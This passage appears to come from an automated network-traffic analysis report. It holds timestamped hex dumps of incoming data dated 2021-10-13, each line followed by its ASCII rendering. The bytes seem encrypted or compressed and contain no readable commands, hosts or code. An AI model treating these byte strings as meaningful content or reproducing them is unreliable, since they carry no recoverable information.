                                Data Ascii: =njw"`P!ubZ6z-O8A%NSE+}\MIxMng;EYk:PNAJ-YC[eIP)Q:YKwr9'~t_O6BDJR'H"c@ A|X.`\Q/D6u}0
                                2021-10-13 14:54:49 UTC38INData Raw: e1 7e 1a 19 11 7a b9 bd 42 0d 77 ac 6c 63 b9 89 80 21 5e f4 c3 eb 3d 38 1c c4 08 cd 4e 44 1a 56 8c 70 9a 40 d7 57 19 b5 bd ca 8c 71 cf 3e 8d 0b 49 25 1d 74 57 d9 fd 40 77 08 bc 7f c6 cc 8b 3c a3 3e c3 b1 ab 80 5f 7c fb 19 75 03 26 23 d6 89 ac f4 30 52 70 f0 c6 27 0f f6 a1 8b c4 70 72 32 ef c1 f4 40 01 1d c7 58 4e 0a bb fa 8c 31 b6 92 99 ab cd 3b d2 83 b2 2f f4 7c d1 aa 1f 81 32 9a e3 74 b3 33 a9 ab b1 75 b9 20 16 8e e1 f7 73 df 28 a8 18 1e d8 ee af a7 4b ca c3 a9 55 a7 0d d5 7a 7f fa ac dd 44 41 56 11 c8 31 b9 67 e7 20 37 5d 5a 92 af 26 35 79 8d c6 d5 fc 2d 3f 3e 12 20 0b c3 8b 04 f4 9c 3c 24 2d 83 1f d9 f7 ce ff 21 de 7a bb ca f3 bc 6d 0c 5d 0e 2f 94 98 49 44 1b 3f a4 95 e5 8a 40 68 a3 25 ba ff 9a ab 4d 63 d8 a3 10 61 b4 f9 04 d5 87 0a 42 62 da be 31 d1
                                Data Ascii: ~zBwlc!^=8NDVp@Wq>I%tW@w<>_|u&#0Rp'pr2@XN1;/|2t3u s(KUzDAV1g 7]Z&5y-?> <$-!zm]/ID?@h%McaBb1
                                2021-10-13 14:54:49 UTC39INData Raw: b7 1b fd 9e 31 a0 d1 57 ff 24 8e de 68 56 75 2d ca 90 21 53 dd ad da 08 8d bd 5d 77 75 0d d9 50 6d 9b 15 99 93 5f 99 ab a1 d2 0a c6 f1 41 ab ec c9 49 26 18 9f c4 96 0c c1 a7 74 10 ee ce d3 2b 79 86 5a cc 11 e7 da c4 03 14 20 23 a3 7e 69 e1 cf a4 cb 3d d2 65 d8 c5 24 65 0f f6 59 a1 42 cd 92 87 21 f1 34 f4 f5 f1 d8 0c e0 e4 fc dd 8b 95 e9 d9 ec 4e ae 29 23 ee a5 32 03 8c 69 8f dd 03 f4 a4 bb ab 93 0a dc 0f bc 49 0c 7a 39 c2 eb 0e 88 66 d2 9c 22 51 86 72 b8 9a d1 b9 7e df b1 15 d6 ef 36 da ec 29 ff 2c 3f 77 9a fb 17 9f c6 00 96 bd 4f 7a ad ff a4 e4 79 fc fd a5 e2 cd 84 a9 9f b8 2b 1a 44 9d 7d 07 6b 8f 2e 36 03 93 b1 9e c8 05 87 49 72 d7 9d d0 0f 3a 13 11 43 c3 d0 a0 3b 58 de 12 22 fa 62 76 50 2c 01 d1 c4 17 5a b1 44 61 26 af b0 af 2b a0 86 6d c4 52 02 e7 b3
                                Data Ascii: 1W$hVu-!S]wuPm_AI&t+yZ #~i=e$eYB!4N)#2iIz9f"Qr~6),?wOzy+D}k.6Ir:C;X"bvP,ZDa&+mR
                                2021-10-13 14:54:49 UTC41INData Raw: 36 8c df e1 e5 59 33 a9 96 d1 7e 0e 60 62 f9 f2 98 c7 31 92 8d 06 ab 7f 54 b0 c9 58 15 b8 7b 6d b1 e2 a0 dc 59 d9 6c e4 28 05 ee 2d b2 42 d3 68 7a 01 b6 2e 1e ab c4 21 4d 43 38 14 27 f6 81 9e a7 56 1f c3 ab c0 7c 14 30 ed 5c e5 56 e1 6b f4 87 0b 91 e0 20 90 f6 f3 2e ff f5 b1 56 bf 6d 4d 68 9d f4 43 0d 06 10 cf c2 a9 93 4f 5c 33 c9 d2 5e 5f 15 5a cc d6 dd e0 63 93 41 4c 5d 69 dc c0 b7 92 3b dc 44 ee 37 51 1e d9 43 f9 b9 03 c3 69 7a 78 a5 53 7a 3a df 60 30 4a c4 ec cb 1f aa 2c db f1 47 9e 53 91 ec 34 7c 94 44 a3 98 6f f5 20 18 05 13 61 9e 04 59 d2 d0 23 4a 9f 2e db 4c 4b 56 b8 0c 76 87 c3 96 f4 e1 8f 94 5a c0 b0 db bb 2d a0 a7 37 86 b6 2c 7e ec 59 08 58 ab ad 99 a7 0c 42 7c 5e 12 0c 9e ab d1 9f b9 f2 a8 ca 51 36 05 81 2f e9 98 24 aa cc 6e c3 68 b2 fe 94 c3
                                Data Ascii: 6Y3~`b1TX{mYl(-Bhz.!MC8'V|0\Vk .VmMhCO\3^_ZcAL]i;D7QCizxSz:`0J,GS4|Do aY#J.LKVvZ-7,~YXB|^Q6/$nh
                                2021-10-13 14:54:49 UTC42INData Raw: c7 21 0d 76 7a 32 a0 04 6b af 86 4a 1e 64 9e c6 39 ba 89 97 05 6b f3 eb 95 53 02 17 ec 13 ca 66 17 0a 43 a2 c5 22 42 dd 4f 02 8f af c6 94 55 bd a4 8c 0d 6b 10 1a 5c 5d b7 c7 4b 1d d4 93 c9 9c cf 81 11 93 95 cd a3 a1 80 04 7d fb 19 4c 58 0d 23 d1 a1 82 22 2e 82 37 55 c6 27 0f 8f bc f4 c5 7a 6b 44 81 d5 9b 39 13 1a e6 13 dc 0e 93 7c e2 91 bd 9e 94 b0 81 34 f1 92 9b 33 e8 7c ef aa 1f 81 70 39 c9 3d b0 74 0e ab b1 79 82 b3 06 8a 65 51 70 81 61 b8 1c 07 f9 79 bf af 66 8c 72 a1 44 a5 84 e6 6d 4e ed bf dd 71 41 56 11 b4 95 a9 62 c5 34 1a 58 76 af 8a 1c 3a 08 f8 ee 64 fd 5c 45 2f 1a 36 ce cf 92 00 93 fe 34 aa 90 99 52 c8 f0 e0 11 80 df 70 9c 4d 30 a3 62 1a b6 30 2a 94 98 58 44 ed 3e a4 95 1c 8d 44 5e b2 09 93 f5 63 d6 30 9e d8 dc 6c 61 b4 f8 0c f9 fd 78 51 63 d0
                                Data Ascii: !vz2kJd9kSfC"BOUk\]K}LX#".7U'zkD9|43|p9=tyeQpayfrDmNqAVb4Xv:d\E/64RpM0b0*XD>D^c0laxQc
                                2021-10-13 14:54:49 UTC43INData Raw: 73 d9 65 b8 8a 76 b3 3c b7 c4 7a 46 20 a6 b0 78 53 6c 48 29 9a 21 48 c6 b7 f8 93 8f 91 52 20 58 0d d9 5a 12 a9 81 93 93 4e 85 39 97 2c 0b eb eb 73 69 c4 af 4a 39 00 e3 53 96 1d c1 b1 51 65 ee e2 d0 7c 4c 87 5a c6 26 c6 c9 ce 09 5a 06 1d 54 57 ce f4 c7 c1 d7 b0 d3 6f fa 55 33 4d 84 98 f9 aa 64 ce b7 16 33 fb 3e 8a 73 ef ce f8 c9 7e e7 db 5d 3b e3 f2 fa 6f 92 a2 22 e4 87 29 8c 8d 63 ad a3 8f f5 ae a2 86 3a 1d cf 03 af 52 2e 22 2f 3c e0 33 88 5c b1 ab 59 41 8c 74 c6 1a c8 47 79 9c 30 17 06 ae 27 d0 c6 b6 eb 2c 39 6e b7 a4 03 8e ca 39 8e 95 2c 73 a1 e0 d8 64 78 ed f1 92 4a 33 85 83 9d bb 12 b8 6d 12 76 8b dd a2 11 26 17 be 21 8e db 05 aa 6e 69 cd af 1c 7d 34 16 05 56 d5 c4 ae 23 43 da 6c 00 ee 9c 71 6d 24 07 c5 a1 33 49 bb 5d 6f d3 bf 99 c2 26 a7 be 9e 29 a6
                                Data Ascii: sev<zF xSlH)!HR XZN9,siJ9SQe|LZ&ZTWoU3Md3>s~];o")c:R."/<3\YAtGy0',9n9,sdxJ3mv&!ni}4V#Clqm$3I]o&)
                                2021-10-13 14:54:49 UTC45INData Raw: ba 30 5b 1a 85 c8 3d c0 ed 3f ba 99 be c3 0a 77 96 ff b1 36 de 22 9d 9e 1b 96 61 5b 4e c8 66 1f bb ca 73 be fb a8 d5 60 84 7a 1a 2f 3a e9 25 bb 6f 68 79 7f 14 8e 41 1c 87 c0 22 6c 7b 87 e0 f0 83 86 b4 ad 56 2a d1 ae e3 16 14 30 b0 33 24 47 fe 79 6a a1 33 33 e1 2a 96 f1 de a0 3d f5 b1 c0 91 e6 6d 98 97 e7 44 80 07 20 f1 02 a9 95 5e c4 21 f8 60 8f 5f 13 4c dd d7 c7 c0 c7 87 55 58 e9 cc c7 e0 09 fd 2e dc d8 e2 03 56 99 d9 49 ea 23 14 d8 61 dd 78 a5 59 ca 5e e9 51 5b d6 c4 e2 c4 28 59 b1 dd e4 22 0d 19 0d e0 03 23 8b 1e 39 8d 79 e8 39 1d a7 14 7e 99 0a 6c 3a c4 3c 44 9b 09 11 4a 54 5f b4 18 e3 a9 e2 87 eb df 02 98 31 c0 af c9 3c 03 ac b6 28 f8 3c 02 2e ff 46 58 d7 a5 a3 85 95 a7 5a 54 10 8e 0a 87 60 fe 2a 91 c5 a8 56 5d 3a 18 89 f8 e9 98 2e e8 ca 60 d9 27 b8
                                Data Ascii: 0[=?w6"a[Nfs`z/:%ohyA"l{V*03$Gyj33*=mD ^!`_LUX.VI#axY^Q[(Y"#9y9~l:<DJT_1<(<.FXZT`*V]:.`'
                                2021-10-13 14:54:49 UTC46INData Raw: f4 1a 7e d7 31 1b c5 78 32 aa 7c ca be 95 6b 1e 7e b7 4d 54 0b 88 86 03 69 e0 d5 f2 41 3a 24 c5 02 ca 77 09 08 45 10 4b 29 53 de 40 3b f9 0d cb 86 53 86 36 9c 06 49 9a 1e 74 5b d9 75 40 77 08 af a9 9c d9 75 3b 9a 8c e9 2d ae a8 7a 13 49 12 5d 55 31 dd d1 b7 76 f5 50 61 f6 ca c7 27 14 fa e6 6a c6 70 7e 32 22 c1 f4 40 3a 86 ec 3b 56 01 82 71 a5 91 bf 9e 98 cc 10 27 d3 89 90 be fd 54 f4 b9 19 9a 1a 8b de 2b a9 0e 30 e8 a0 65 bb 31 9d 99 62 51 6e ff 1f d6 ae 0c d1 f2 90 84 71 e8 c3 ad 2b 1d 96 c6 76 1a ee aa f5 7b 52 58 0a d5 ba 1f 75 fe 05 1f ca 50 be ac 26 3e 60 80 c6 ac fc 2d 3f 40 0f 36 dd da 88 04 e9 9a e3 b9 8f a0 c5 da e6 68 c9 12 6b 03 b4 5c 2d b4 6c 07 b2 14 2a 92 8f df 74 4c 3f a5 8c 2e b1 56 6e b5 b8 a9 e8 75 98 31 9e d3 c2 38 63 b4 ff 0e e9 8b 1d
                                Data Ascii: ~1x2|k~MTiA:$wEK)S@;S6It[u@wu;-zI]U1vPa'jp~2"@:;Vq'T+0e1bQnq+v{RXuP&>`-?@6hk\-l*tL?.Vnu18c
                                2021-10-13 14:54:49 UTC47INData Raw: cd d8 fb 62 d2 7a b1 44 77 83 7d a6 cc 48 ee 21 a7 a1 5b 55 73 1e 3a 90 21 07 cc a8 e3 1e 34 bd 5b 12 8f 0b a7 68 0c a2 96 b1 84 5d 8f 20 a2 95 09 c7 e4 63 ba c6 af 4c 49 d8 f0 59 9c d2 c5 8b 74 ac ef ce d3 48 dd bf 5a c6 33 16 da c2 77 79 0d 04 ae 7e f5 e2 cf a8 8c f6 d0 65 d4 fb 29 4f 82 f1 36 6d 64 c4 b0 d2 2e d4 16 ac 79 f0 d2 0b e0 6a fc dd 87 58 e3 f4 d1 46 9a a2 22 ee af 5b 8d 91 4b 85 bc 95 f5 a4 b0 83 25 3a dc 15 e3 43 2a 27 38 c2 e0 04 be 74 db e8 41 52 86 2a d7 10 c1 ca c2 b0 29 1f dc e3 59 e3 c5 9e fb 04 2e 66 9f d6 2a c7 c3 11 99 bd 34 7b ad ff a4 a8 78 fc f1 53 54 e8 ac 98 8c bd 30 12 44 2a 7c 07 6b 7c 11 21 7a 88 3f 9f cc 27 bd 7d 63 d4 99 ab 7f 18 17 39 5c d2 db b7 5f 8f da 7d 00 26 6c 55 69 10 10 d6 a1 3e 70 89 42 70 27 60 b5 c6 27 a3 9a
                                Data Ascii: bzDw}H![Us:!4[h] cLIYtHZ3wy~e)O6md.yjXF"[K%:C*'8tAR*)Y.f*4{xST0D*|k|!z?'}c9\_}&lUi>pBp'`'
                                2021-10-13 14:54:49 UTC48INData Raw: 65 ca 52 bf 36 51 3d 85 c8 5e e8 46 2f c9 29 d1 6f 01 64 98 e7 c4 b3 64 22 97 87 3f 1e 63 5a 48 e0 50 13 93 6e 79 b9 d9 8a dc 48 d6 6c e4 28 2e c5 8b a2 47 d5 51 5b 1e a6 da 37 b6 c6 0a 42 6d 79 eb b8 25 84 a5 a3 6f 28 e8 1a 94 7d 12 18 95 5c e5 4d d6 e6 79 ac 01 9d c9 98 95 e0 d5 c2 d7 46 b2 ca bf 09 e9 99 9d fe 4b fe b5 09 ef 0b c6 14 4e c0 3f c7 9d 04 5e 15 50 3f 59 c6 c0 cc 80 48 64 75 6c c7 e6 70 16 3a dc d2 e0 44 c4 98 d9 49 96 a2 04 de 43 fb 17 2d 52 e6 36 ae f6 58 d6 c8 e0 c5 28 67 b3 dd e8 3e 05 19 0d e0 23 18 3e 1f 3f 94 1f 7e 3e 35 93 02 11 1b 1a 65 44 b9 b5 45 80 2b 54 40 45 53 8f d8 ea 81 d6 a5 eb d5 13 92 45 d1 af c9 d9 2a a9 4b 29 ef 23 45 a8 ff 46 54 d3 53 b6 ed ab a4 53 78 74 fd 11 80 be f7 1c bf e3 ae 51 7f 9f 10 a1 c6 c1 bc 24 36 c0 1e
                                Data Ascii: eR6Q=^F/)odd"?cZHPnyHl(.GQ[7Bmy%o(}\MyFKN?^P?YHdulp:DIC-R6X(g>#>?~>5eDE+T@ESE*K)#EFTSSxtQ$6
                                2021-10-13 14:54:49 UTC50INData Raw: 8d 8f e9 dd a8 7e c0 24 36 e1 69 37 ba ed 7b 93 97 4a 0f 5c 07 43 2f 92 0d 84 09 7c e3 4e e6 52 02 1c c8 0a dc 63 91 26 56 8a 59 81 4a da 58 25 82 aa 47 a9 59 95 3c 9e 09 70 05 0b 63 c1 a7 c3 69 d4 02 bb 5d 8c cb 9d aa a7 a2 c8 a7 37 80 6d 7c fb 19 8d 60 25 23 d1 89 9c f4 30 52 37 fe c6 27 0f 88 f1 f5 c5 71 09 62 90 c0 f5 b4 19 19 ec 4f 4e 0d 93 61 a7 31 bc 9e 85 93 a1 26 8f 83 b8 22 a3 54 fe bb 6c 31 1f 98 c2 37 bc 65 30 aa b1 77 82 33 05 8a 69 68 34 ed 12 bf 34 15 d3 f8 ba c0 a6 e3 d2 aa 9a a1 b2
                                Data Ascii: ~$6i7{J\C/|NRc&VYJX%GY<pci]7m|`%#0R7'qbONa1&"Tl17e0w3ih44
                                2021-10-13 14:54:49 UTC50INData Raw: ee 4b 6e fc a0 f9 48 79 56 1b d1 ea a8 64 b1 3a 36 5d 54 96 b1 35 30 77 ac bf 67 fc 2b 11 36 18 37 db bf 45 15 fc 87 eb a4 bf 99 e7 cb f0 ec 73 08 e6 70 96 54 f3 b2 79 21 a2 04 3b 94 98 52 2d 4c 23 86 9f 37 ba 41 78 a2 25 b8 cf 1a b6 7c 9e d7 b7 10 61 b5 e2 2f ec 83 ee 52 63 da d2 64 d1 73 c9 8c 73 3e 8f c2 49 7b 46 3e b0 9f af fc 0b 77 96 eb db e5 f1 23 97 89 3f b9 62 5a 48 c5 7d 3b 53 67 72 b8 d9 3e dc 48 d6 52 86 29 29 e7 29 a5 56 d7 51 4e 1e a6 da 32 80 c0 01 95 d9 85 ea d8 18 83 9c 32 45 2f ca b8 9f 6c 1c 18 70 5f e5 41 d6 b9 78 ac 01 b9 2a 2b 96 ea bc 03 fe f5 bb d9 bf 73 45 04 9d f4 49 b9 16 0a ef 07 ba 94 5e c7 18 d7 f4 87 82 7c 58 50 d0 d1 d1 c0 84 9b 5f d3 7c cc d8 3a 90 3b dc c9 e0 03 b3 9a d9 45 d1 e4 06 de 4f fd 73 8d ae e6 3c c7 68 d4 89 c2
                                Data Ascii: KnHyVd:6]T50wg+67EspTy!;R-L#7Ax%|a/Rcdss>I{F>w#?bZH};Sgr>HR)))VQN22E/lp_Ax*+sEI^|XP_|:;EOs<h
                                2021-10-13 14:54:49 UTC51INData Raw: 14 d6 ef 36 de ab 59 ff 2c 33 5e 32 2e fd 71 1e 07 8e 9b 59 42 ad f9 ca 42 74 ed f5 f8 61 cd 84 ae e3 ea 3a 1e 66 ce a2 12 44 8a 26 27 04 b1 2d 92 bb b5 aa 7f 69 d9 99 da 7c 18 1b cf 47 d6 f1 b6 1a 49 da 7d 4b cc 62 70 43 27 10 d6 f2 33 58 b1 21 71 2d be 09 c1 0d a2 90 6b d5 59 01 88 99 17 dc 84 7d d7 31 33 e1 78 fc a1 13 7a 6b 94 61 0d 62 a6 44 3b a0 89 86 08 69 c4 c6 e1 56 03 1d c4 6c ca 66 0c 0f 45 8f 60 d6 42 d7 51 31 87 b8 d7 78 58 b9 38 9b 07 7f 12 18 74 4c b3 d8 48 89 03 97 5f 9b d8 5d 30 94 8d d2 b4 ad b9 79 63 f1 ed 5c 73 2d 2a ca 77 85 eb 3b 4b 1a ca d6 22 1e 0f cf d9 cd 48 0e 5d 90 c0 e8 59 17 1a fd 3e 44 f3 92 56 84 19 92 9c 9e a5 ae 3f c0 86 b8 33 f8 43 00 ab 33 88 07 8b cd 3d ab 1e 07 55 b0 5f a6 22 05 e5 a6 40 65 e4 20 b2 01 1e d4 f8 ad aa
                                Data Ascii: 6Y,3^2.qYBBta:fD&'-i|GI}KbpC'3X!q-kY}13xzkabD;iVlfE`BQ1xX8tLH_]0yc\s-*w;K"H]Y>DV?3C3=U_"@e
                                2021-10-13 14:54:49 UTC52INData Raw: b0 d7 e4 33 bd 18 0d e0 03 af 88 1e 39 89 1f c4 3f 35 93 38 79 95 10 b8 51 d7 3c 44 5e 35 62 62 63 59 a7 18 f9 85 da 8d c3 ed 13 92 4f 0c a6 c8 27 2b c1 89 28 fe 20 02 b9 fc 46 58 d3 c2 8f 8d 87 ad 4e 74 31 3f 0b 81 b4 fc 06 aa fc be 45 5a 11 d1 a1 c0 e9 89 2a 27 c7 eb c7 4d 01 c2 94 c3 84 eb 1b f8 62 d5 6b b4 5c 53 9f 31 ac d5 3d d3 21 a6 b0 78 50 5b 56 3b 90 2b 48 ca 80 28 6e 8e bb 34 aa 84 0d d3 2e 1f a2 92 82 fc 4a 8e 26 80 c1 01 d6 e4 63 79 c7 af 4c 49 ac f1 59 9c 78 d9 ae 5c 80 fc c9 c8 42 dd 5b 59 c6 3f a7 68 c5 09 41 78 16 aa 56 f9 f3 c7 bc ac a0 db eb 65 c4 ea 65 84 f7 59 80 75 c3 ab 04 08 11 3e 9b 7f e3 d1 75 ea 50 fc db 9e 8c f2 f8 ea 42 ae 7c 22 ee a9 32 a5 8f 69 83 a3 85 e4 af de a7 27 0a da 18 a5 52 2d 52 1e c0 e1 19 9f 7d f3 69 42 52 80 1b
                                Data Ascii: 39?58yQ<D^5bbcYO'+( FXNt1?EZ*'Mbk\S1=!xP[V;+H(n4.J&cyLIYx\B[Y?hAxVeeYu>uPB|"2i'R-R}iBR
                                2021-10-13 14:54:49 UTC54INData Raw: 47 ae 97 c0 54 f2 fc aa ff 0f 67 54 1b dd 1f 9b 73 ca 39 db 5e 50 b8 c9 aa 30 71 8e c2 41 ed 2b 28 2a 32 db de d0 85 00 ea a5 71 ab 9a bb c7 51 d8 0d 7d 20 d8 65 80 76 69 b3 7f 01 b5 82 54 b2 9a 52 2d 5d 39 8c 72 3a a0 47 17 89 27 b8 f9 1c bb 36 f1 c1 ac 10 6b a5 f3 70 22 83 0a 5a 59 11 40 9b 2e bc ac 27 79 4b be c8 37 e9 6a 32 ab 99 a4 54 0b 77 9d 97 89 9b df 28 4b 9c 1f b9 b6 49 46 d9 7c 02 9a ea c5 81 8b 5b 23 b7 02 6f 3f 01 1e ed 3a ab 54 d4 0a c5 1e a6 da 14 af fe 0a 48 71 59 e8 de 23 80 9e a7 45 6e f4 ab 97 7f 14 30 b1 0a e5 47 fe 39 78 ac 0b 31 e0 2a 96 f6 d3 cf ff f5 b1 ca b9 7a 6d 98 9d f2 43 91 00 cb ee 01 a9 5a 4e c0 35 c5 f2 8c 5f 0f 5a 50 d1 dc f0 c3 93 29 4d c1 6f b2 e0 03 83 48 66 d8 e8 21 7b b1 37 40 f9 23 09 a0 75 ec 78 af 5b 89 8c c0 7f
                                Data Ascii: GTgTs9^P0qA+(*2qQ} eviTR-]9r:G'6kp"ZY@.'yK7j2Tw(KIF|[#o?:THqY#En0G9x1*zmCZN5_ZP)MoHf!{7@#ux[
                                2021-10-13 14:54:49 UTC55INData Raw: 69 ba 3e 8f c5 e9 38 c7 d7 8c ff 3d 2b 7b 95 2e 03 a2 c9 29 f6 94 2c 79 b2 f2 d8 7c 78 ed e9 92 7f 33 85 83 80 bb 2b 16 03 0a 7d 07 6b bd 37 34 16 bb 2f 8d d0 f1 ab 53 7a fa ac e1 7c 1e 39 32 45 d0 d1 99 cf 4a da 7b 22 dc 62 70 4b 34 14 cf b8 21 58 a0 50 6f 24 40 b4 ec 0a b4 95 66 ca 53 12 9a 99 06 ce 9b 69 29 36 1f e8 40 85 a1 13 7a a0 80 72 1f 77 b7 56 24 a0 77 87 25 71 dc c2 e5 52 04 0e c1 1d d1 75 0f 19 47 98 47 3a bc d6 7d 38 ae 2c cb 86 59 8a 27 9e 1f 61 10 0f 6b 48 48 c6 6d 61 13 b1 41 07 e7 1c 39 8b 81 d7 99 83 a8 7c 76 ed 20 19 40 33 30 c2 a1 99 e6 2f 45 e1 cb eb 2d 14 fb d9 6f d6 76 67 43 83 d2 f4 5b 00 01 12 3a 70 07 ed e9 8d 31 b6 8d 98 bf b1 34 d3 92 aa 3d e6 aa ff 86 16 b3 24 99 c8 3d a5 07 08 b9 b1 62 b8 3b 1b 74 6e 6c 7c ff 18 af 86 25 6e
                                Data Ascii: i>8=+{.),y|x3+}k74/Sz|92EJ{"bpK4!XPo$@fSi)6@zrwV$w%qRuGG:}8,Y'akHHmaA9|v @30/E-ovgC[:p14=$=b;tnl|%n
                                2021-10-13 14:54:49 UTC56INData Raw: c2 0a de a1 d6 ff 5d 1b 30 07 ee 2b 71 e4 e2 3f 9e 7a e8 34 24 89 02 a8 09 33 6e 4a d6 3a 2b 7c 21 47 40 0b 75 d2 03 e1 90 cc 1c fd c4 18 83 55 4b c0 00 27 2b b5 a2 f2 91 c5 2a 61 f5 55 5b d5 a6 a3 9d 90 71 d8 6a 4f 85 1b 91 a9 27 95 d6 3b a8 56 5d 31 c9 ce 2f e9 98 2e 25 cc 02 f6 4a 7f f8 87 d2 9f c6 ad 32 62 d3 70 ab 45 59 8e 20 ae ad 7a ec 21 a0 ab 7a 47 75 2d 1e 92 21 5f dd b9 e3 68 e1 9b 59 18 83 1c c8 72 01 a6 92 9f fc 75 8d 26 8c d4 1b d6 8d 53 a3 c4 a5 5b 36 09 26 4a 86 1d db bf 4b a5 f2 31 26 bb e4 8e 4d 10 2a c1 cb cd 18 58 32 a7 57 a9 1d 3e da 8b 8c 86 d3 65 d8 c0 22 3e 38 f7 59 a1 69 ec 82 0c 20 fb e0 99 7f da d1 2c c8 13 e0 dd 8d 86 e3 f2 fb 66 86 a2 22 2b ad 5d 8d 6b 6b 85 b2 9a f5 a4 b1 99 25 0a dd 12 9f 44 24 be 3a c2 e1 65 8e 77 ca c7 fb
                                Data Ascii: ]0+q?z4$3nJ:+|!G@uUK'+*aU[qjO';V]1/.%J2bpEY z!zGu-!_hYru&S[6&JK1&M*X2W>e">8Yi ,f"+]kk%D$:ew
                                2021-10-13 14:54:49 UTC57INData Raw: e6 fa fc 44 af 91 cb 75 46 1f a9 f5 66 69 b2 18 db 32 80 3f cf 11 31 4e 54 b7 8e d1 33 71 82 c6 83 ff 2d 3f 07 47 37 dd d6 90 13 f5 a5 dd a9 9a b7 f8 22 f3 e6 78 08 83 70 96 58 3e ba 76 23 bf 1c 3b 92 b0 4f 2f 4c 39 8c c2 39 a0 47 6b a4 2c 90 e1 1e aa 36 b6 c6 a9 10 67 9c a4 1f e5 85 06 41 6b f2 90 66 d1 64 ac 1e 5d 3e 85 c2 21 c6 15 4d 98 91 d1 69 18 7e 8d f1 cf 9f f7 c7 94 8d 11 bf 66 72 69 c8 74 19 fc 4c 70 be f7 b4 d5 59 d4 15 3e 2b 29 eb 2b a8 56 d4 16 59 1c a6 d6 0e 8e ee 2a 4c 7b 81 85 f2 0b 87 b2 a1 54 26 af b3 96 7d 1e ee be 79 cd 70 fe 73 73 bf 01 b9 d9 2a 96 ea 0d cf 21 e0 94 e2 8e 7a 6d 92 8e ff 30 2b 00 08 e5 0a 81 ab 4f c0 3f 0e f0 8a 75 12 70 50 d0 c7 81 f2 93 41 4c c1 6f c7 5b 03 92 3b 98 d8 e8 2b 8e 99 d9 43 f6 25 05 de 53 ec 78 a4 53 e6
                                Data Ascii: DuFfi2?1NT3q-?G7"xpX>v#;O/L99Gk,6gAkfd]>!Mi~fritLpY>+)+VY*L{T&}ypss*!zm0+O?upPALo[;+C%SxS
                                2021-10-13 14:54:49 UTC59INData Raw: f9 d1 b9 72 a1 2f cf c1 3f 38 ff d5 99 d7 b0 39 64 95 cf 12 a6 29 10 9f 9f fa 66 94 a4 11 7d 7d f4 ea 88 72 27 85 af 86 31 65 1e 6c 13 54 34 60 a2 1b 2b 15 bd 29 49 db 09 bb 79 72 db 8f dc 83 e7 ee 19 6d 4c db b1 3a 43 04 6f 22 cf 62 70 4b 0f 3e d4 ab 35 52 99 7a 70 2d b4 6b c0 0b 88 86 6b 94 45 01 88 99 17 dc 84 7d d7 37 33 9b 79 32 a0 69 7b bf 95 73 0d 77 a6 5e 3b ba 88 9d 39 7d f4 c5 e0 52 02 63 c4 02 db 64 17 1b 40 e5 b9 22 42 dd 4e 6e a5 b5 c8 91 36 9d 3c 8d 07 6b 07 35 e8 5d b6 cd 69 11 03 bb 5d 90 bc ad 3b 8b 8d d2 b7 bc ae 68 54 d3 17 5d 59 32 ae d7 a1 88 f5 23 50 0e c2 d1 59 61 f1 ce f1 67 61 70 49 84 e8 3d 4b 12 10 fd 3d 48 25 ba 7e 8d 37 ab 13 99 a3 a2 27 c0 8b a9 2a eb 43 72 21 1f 8b 1e 3a d9 35 ae 0f 33 62 b0 73 a0 35 01 9e 47 6a 61 ee 14 ae
                                Data Ascii: r/?89d)f}}r'1elT4`+)IyrmL:Co"bpK>5Rzp-kkE}73y2i{sw^;9}Rcd@"BNn6<k5]i];hT]Y2#PYagapI=K=H%~7'*Cr!:53bs5Gja
                                2021-10-13 14:54:49 UTC60INData Raw: d0 ea 16 c3 00 d8 98 41 ee 4d 8b 0b 09 ec 03 87 88 1e 39 b6 5e fb 3f 33 b1 f0 7f 93 11 4d d2 d6 3c 4e 93 26 41 62 c3 5a a7 14 c2 af de 86 ed fd f6 93 45 db 87 55 27 2b b5 a6 2d ef 2c 02 4f fd 46 58 d2 85 9c 8d 87 ad 54 82 5f 9f 0d a9 90 f3 0f bf e4 80 78 57 29 19 b7 3e e8 c7 08 31 de 7d 09 ef 7f fe 94 d2 88 eb ec f9 62 d5 6c 99 5a 77 9f 3b b0 ec 12 9d 03 a4 ba 6d 45 7b 53 32 b8 76 5b cc ae 9d 45 8c bd 5d 09 8d 1c df 35 29 a0 92 9f 82 57 9e 22 a2 d0 0b c7 e4 24 84 c6 af 4c 37 16 d8 1a 92 0c cd c1 76 99 ef c8 de 55 fd e8 42 c7 39 c2 04 91 7a 69 0e 04 ac 45 eb f1 c6 86 f3 b3 d3 63 bd fb 32 4d 84 e6 50 ba 63 ab 9e 0e 20 f7 2f 92 68 f5 f0 04 c9 52 fa b2 ab 84 e3 f4 ea 4e ae e1 26 ee a9 32 a7 8f 69 83 b5 9e fc cb a9 82 25 00 02 1c 8a 6b 13 3d 38 c8 f2 15 fd cd
                                Data Ascii: AM9^?3M<N&AbZEU'+-,OFXT_xW)>1}blZw;mE{S2v[E]5)W"$L7vUB9ziEc2MPc /hRN&2i%k=8
                                2021-10-13 14:54:49 UTC61INData Raw: d3 89 62 e3 d4 b1 49 87 de c2 7c 68 93 80 f7 60 47 50 0a d6 5b b0 63 cf 1b e9 48 75 96 91 37 30 7b 97 e0 17 46 2d 39 25 17 1f e5 d0 83 1f 22 b4 24 bb 8d 67 c3 da e1 f7 6f 32 50 c7 a9 86 d3 4d 80 1a a5 0f ed 87 9e 43 2d 5d 2f 9a 14 c7 5f be a6 b6 00 90 c8 1a aa 3a 8d d6 de aa 61 b4 f3 12 cd bb 0a 50 69 04 bc 62 fb 6b 90 36 73 7f b1 c8 37 e8 46 3e ba 56 d1 6f 0b aa 9c f8 de 39 de 22 97 98 17 ae 60 40 4e c8 75 13 93 64 72 ec f1 a5 dc cf dd 7a 1a f0 28 ed 3a b4 47 d3 79 65 1e a6 d1 0c b7 c5 0a bf 7b 87 ea 5c 09 87 a5 b1 56 29 f8 61 97 7d 14 30 a0 5a f2 b9 ff 5f 7a b4 18 97 e1 3b 90 fd 2d ce d3 f9 a0 ce b0 15 8c 99 9d fe 4f 8f 13 0e ef 10 af 8c 45 3e 34 fc fb 85 4e 10 68 b6 cf cc d3 c0 93 50 4a d9 91 c6 cc 0a ba 15 de d8 ee 20 68 8a df 43 e8 23 1c 20 48 c0 7e
                                Data Ascii: bI|h`GP[cHu70{F-9%"$go2PMC-]/_:aPibk6s7F>Vo9"`@Nudrz(:Gye{\V)a}0Z_z;-OE>4NhPJ hC# H~
